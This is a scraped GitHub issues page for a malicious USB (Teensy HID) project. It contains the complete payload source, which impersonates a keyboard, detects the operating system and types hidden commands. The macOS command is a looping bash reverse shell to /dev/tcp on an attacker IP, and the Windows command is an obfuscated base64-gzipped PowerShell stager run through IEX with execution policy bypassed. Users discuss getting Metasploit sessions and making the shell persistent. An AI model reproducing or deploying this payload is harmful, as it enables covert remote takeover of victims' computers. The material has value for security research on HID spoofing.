ebursztein / malusb Goto Github PK
View Code? Open in Web Editor NEWMalicious USB
License: GNU Lesser General Public License v3.0
Malicious USB
License: GNU Lesser General Public License v3.0
The windows payload relies on that windows will somehow automatically enter the payload in a command window or in the 'run' program. However this is not how windows works.
When USB drive gets inserted, and it starts to send out the payload key strokes, it will result in nothing, or at the very best a focussed text box to receive these keystrokes. (similar issue has been reported for Mac).
To fix this on windows send a Windows-key + r key combination before the payload to open the run program dialog.
The code executes on windows and OS X as expected, however, I do not get any sessions on the attacking machine after having set up a listener with osx/x64x/reverse_shell_tcp handler
I've been trying to run the code in OSX but when I plug in the teensy the spotlight opens but the commands are typed in it causing it to fail. I inserted teensy while a web browser was open on computer.
I created a payload_configured.c and copy pasted code into Arduino. When I hit verify to upload it to Teeny3.2 it throws the following errors:
Arduino: 1.6.11 (Linux), TD: 1.30, Board: "Teensy 3.2 / 3.1, Serial + Keyboard + Mouse + Joystick, 96 MHz optimize speed (overclock), US English"
/root/Arduino/custommalusb1/custommalusb1.ino:20:27: warning: missing terminating " character [enabled by default]
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
^
custommalusb1:20: error: missing terminating " character
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
^
/root/Arduino/custommalusb1/custommalusb1.ino:21:1: warning: missing terminating " character [enabled by default]
";
^
custommalusb1:21: error: missing terminating " character
/root/Arduino/custommalusb1/custommalusb1.ino:22:28: warning: missing terminating " character [enabled by default]
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
^
custommalusb1:22: error: missing terminating " character
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
^
/root/Arduino/custommalusb1/custommalusb1.ino:29:53: warning: missing terminating ' character [enabled by default]
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
^
custommalusb1:29: error: missing terminating ' character
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
^
custommalusb1:22: error: expected primary-expression before 'const'
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
^
custommalusb1: In function 'void win_payload()':
custommalusb1:366: error: 'WIN_PAYLOAD' was not declared in this scope
type_command(WIN_PAYLOAD);
^
missing terminating " character
This report would have more information with
"Show verbose output during compilation"
option enabled in File -> Preferences.
This is the payload code:
[code]
/*
* Malicious HID USB payload
* https://github.com/LightWind/malusb
*
* Malicious chimera HID payload that create a background reverse shell to the server of your choice
* Works both on Windows and OSX. See the README to know how to configure it.
*
* @see: https://www.elie.net/malusb for more information on HID spoofing devices.
* @authors Elie Bursztein ([email protected]), Jean Michel Picod ([email protected])
* @licence: GPL v3
*/
#include <stdio.h>
/////////////////////////////////////////////////
/// Reverse shell payloads
/////////////////////////////////////////////////
/* Those payloads stub need to be replaced with actual payloads to work */
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
";
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
GH0I1ZPu1TlH5+oo14qDMejZw52qewGG/SSBhzmbwy66rR6BW1QcjIWOzsHSQvENWEMXaZ6KFqQl
fvJjTJPvVzShydgfTSYTRzcMc/oPbGE1lJ0TXFYHC8vVClcspnQcu/Xy9Tl+9XDNyNLC3lKQXNWt
fFhNp7+KdDYLBoHfjmaIf9/KWu0MytUOdNGAEEj3Ujo0Kg3qDWjkhxjk03TYy7KD0EdKnptcddve
ng/WMpOP6vCFruVa+oNbeq9bCwTXo3iEa3oD8sE2wSe95YW7hrg6ulG8tK2SAc1L24T+9SXxXdMK
IAS3zEHuoKwJrgZEdUYEKJKA4sBz2WT/xxEtDluYu1HOwSwGi0df2cmnh/8wnJ0ScPVJu3V+NozM
5JPaQJTtt9pl7wyjKFVdV8oa4RqNr78l6AXd9jZ6JzuSYHgTXpoU+R7eM4JBa6WX8eqjwLFPuYBS
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
/////////////////////////////////////////////////
/// Internal constants
/////////////////////////////////////////////////
#define NUMLOCK 1
#define CAPSLOCK 2
#define SCROLLLOCK 4
#define LED_PIN 11 // Teensy pin for the led.
#define LOCK_KEY CAPSLOCK // Key used for testing end of command execution. NUMLOCK or CAPSLOCK or SCROLLLOCK.
#define LOCK_CHECK_WAIT_MS 100 // Time between lock checks in ms
#define LOCK_ATTEMPTS 10 // attempts to load the driver
#define DELAY 500 // delay between command
/////////////////////////////////////////////////
/// Lock related functions
/////////////////////////////////////////////////
/*!
* Check the state of the lock key used for locking mechanism.
*/
boolean is_locked(void) {
if ((keyboard_leds & LOCK_KEY) == LOCK_KEY) {
return true;
} else {
return false;
}
}
/*!
* Toggle the selected locked key stats.
*/
void toggle_lock(void) {
unsigned short k;
switch(LOCK_KEY) {
case NUMLOCK:
k = KEY_NUM_LOCK;
break;
case CAPSLOCK:
k = KEY_CAPS_LOCK;
break;
case SCROLLLOCK:
k = KEY_SCROLL_LOCK;
break;
default:
break;
}
set_key(1, k);
type_keys();
}
/*!
* reset lock to unlock
*/
void reset_lock(void) {
if (is_locked()) {
toggle_lock();
}
}
/////////////////////////////////////////////////
/// Utility functions
/////////////////////////////////////////////////
/*
* Fingerprint OSX vs Win/Linux based on the fact that OSX don't have scrollnum
* Idea: Try to toggle and if no change then it is OSX else Win or OSX
*/
boolean is_osx() {
int status1 = 0; //LED status before toggle
int status2 = 0; //LED status after toggle
unsigned short sk = NUMLOCK;
// Get status
status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
delay(DELAY);
//Toggle
set_key(1, sk);
type_keys();
// Get status
status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
clear_keys();
is_done();
if (status1 == status2) {
return true;
} else {
return false;
}
}
void set_modifier(unsigned short m) {
Keyboard.set_modifier(m);
}
/*!
* Set keyboard key values
* @param position: the position of the key in [1, 6]
* @param value: the key value
*/
void set_key(unsigned short position, unsigned short value) {
switch(position) {
case 1:
Keyboard.set_key1(value);
break;
case 2:
Keyboard.set_key2(value);
break;
case 3:
Keyboard.set_key3(value);
break;
case 4:
Keyboard.set_key4(value);
break;
case 5:
Keyboard.set_key5(value);
break;
case 6:
Keyboard.set_key6(value);
break;
default:
break;
}
}
/*!
* Type the given key combination
* type/write the keys, clear and wait to be succesful
* @return if the command succeeded or not
*/
void type_keys(void) {
Keyboard.send_now();
clear_keys();
delay(DELAY);
}
/*!
* Type a command line including "ENTER"
* type/write the keys, clear and wait to be succesful
* @return if the command succeeded or not
*/
void type_command(const char* cmd) {
Keyboard.print(cmd);
Keyboard.send_now();
delay(DELAY);
Keyboard.println("");
Keyboard.send_now();
delay(DELAY * 4);
clear_keys();
}
/*!
* clear keyboard
* return true if sucessful
*/
void clear_keys (void){
// reset all keys
for (int i = 1; i < 7; i++)
set_key(i, 0);
// reset modifier
set_modifier(0);
Keyboard.send_now();
delay(DELAY);
}
/*!
* Wait until the drivers are load and the teensy active.
*
* The idea behind this is to try to get the onboard light to blink
* and then try to lock our lock key. If both succeed then we are ready
*
* @note: Idea from Offsec Peensy code
*/
void wait_for_drivers(void) {
//until we are ready
for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
digitalWrite(LED_PIN, HIGH);
digitalWrite(LED_PIN, LOW);
delay(LOCK_CHECK_WAIT_MS);
toggle_lock();
}
// maybe it is seen as a new keyboard, evading
if (!is_locked()) {
osx_close_windows();
}
//reseting lock
reset_lock();
delay(100);
}
/*!
* Check if a commad is sucessful by testing the lock key
*/
void is_done (void) {
//for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
boolean current_lock = is_locked();
toggle_lock();
while(is_locked() == current_lock) {
delay(LOCK_CHECK_WAIT_MS);
}
reset_lock();
}
/////////////////////////////////////////////////
/// Payload functions
/////////////////////////////////////////////////
/*
char* build_payload(const char* payload_template) {
bzero(payload_osx, PAYLOAD_OSX_SIZE);
snprintf(payload_osx, PAYLOAD_OSX_SIZE, payload_template, MSF_IP, MSF_PORT);
return payload_osx;
}
*/
/////////////////////////////////////////////////
/// OSX functions
/////////////////////////////////////////////////
/** open terminal **/
void osx_close_windows(void) {
set_modifier(MODIFIERKEY_RIGHT_GUI);
set_key(1, KEY_Q);
type_keys();
}
/** open spotlight application to launch other apps **/
void osx_open_spotlight(void) {
set_modifier(MODIFIERKEY_RIGHT_GUI);
set_key(1, KEY_SPACE);
type_keys();
}
void osx_hide_windows(void) {
// minimize background windows
set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
set_key(1, KEY_H);
type_keys();
// minimize active windows
set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
set_key(1, KEY_M);
type_keys();
// minimize active windows
set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
set_key(1, KEY_M);
set_key(2, KEY_H);
type_keys();
}
/** OSX payload delivery **/
void osx_exec_payload(void) {
//hide all the window
osx_hide_windows();
//spotlight
osx_open_spotlight();
//terminal
type_command("terminal");
//payload
type_command(OSX_PAYLOAD);
//cleanup
osx_close_windows();
}
/////////////////////////////////////////////////
/// Windows functions
/////////////////////////////////////////////////
/*
* Fingerprinting technique using powershell
* @credit NFC
*
*/
bool fingerprint_windows(void) {
int status1 = 0; //LED status before toggle
int status2 = 0; //LED status after toggle
unsigned short sk = SCROLLLOCK;
// Get status
status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
delay(DELAY);
//Asking windows to set SCROLLLOCK
win_open_execute();
type_command("powershell -Command \"(New-Object -ComObject WScript.Shell).SendKeys('{SCROLLLOCK}')\"");
delay(DELAY);
// Get status
status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
is_done();
if (status1 != status2) {
return true;
} else {
return false;
}
}
void win_open_execute(void) {
// Windows key + R
set_modifier(MODIFIERKEY_GUI);
set_key(1, KEY_R);
type_keys();
}
void win_payload(void) {
// exex prompt
win_open_execute();
//cmd
type_command("cmd");
//run payload
type_command(WIN_PAYLOAD);
}
/*
* Main function
*/
void setup() {
//wait until the key is up and ready
wait_for_drivers();
clear_keys();
if (fingerprint_windows() == true) {
win_payload();
} else {
osx_exec_payload();
}
}
/*
* Code that need to be executed repeatedly goes here
* @note: not used as payload as one time execution.
*/
void loop() {}
[/code]
Hello,
thank you for your great work!
I was testing your HID-exploit on my windows 10 machine and it successfully spawned a reverse shell on my linux machine running metasploit.
The only problem I have is, that my shell is not persistent (as it should be, right?). After rebooting my windows 10 PC the shell isn't connecting back. I have to plug in the teensy again to get a new shell.
Did I do something wrong while compiling and loading it on my teensy? Is it a windows 10 problem?
Or did I misunderstood the "persistent" part? I thought the shell would try to reconnect periodically.
Greetings!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.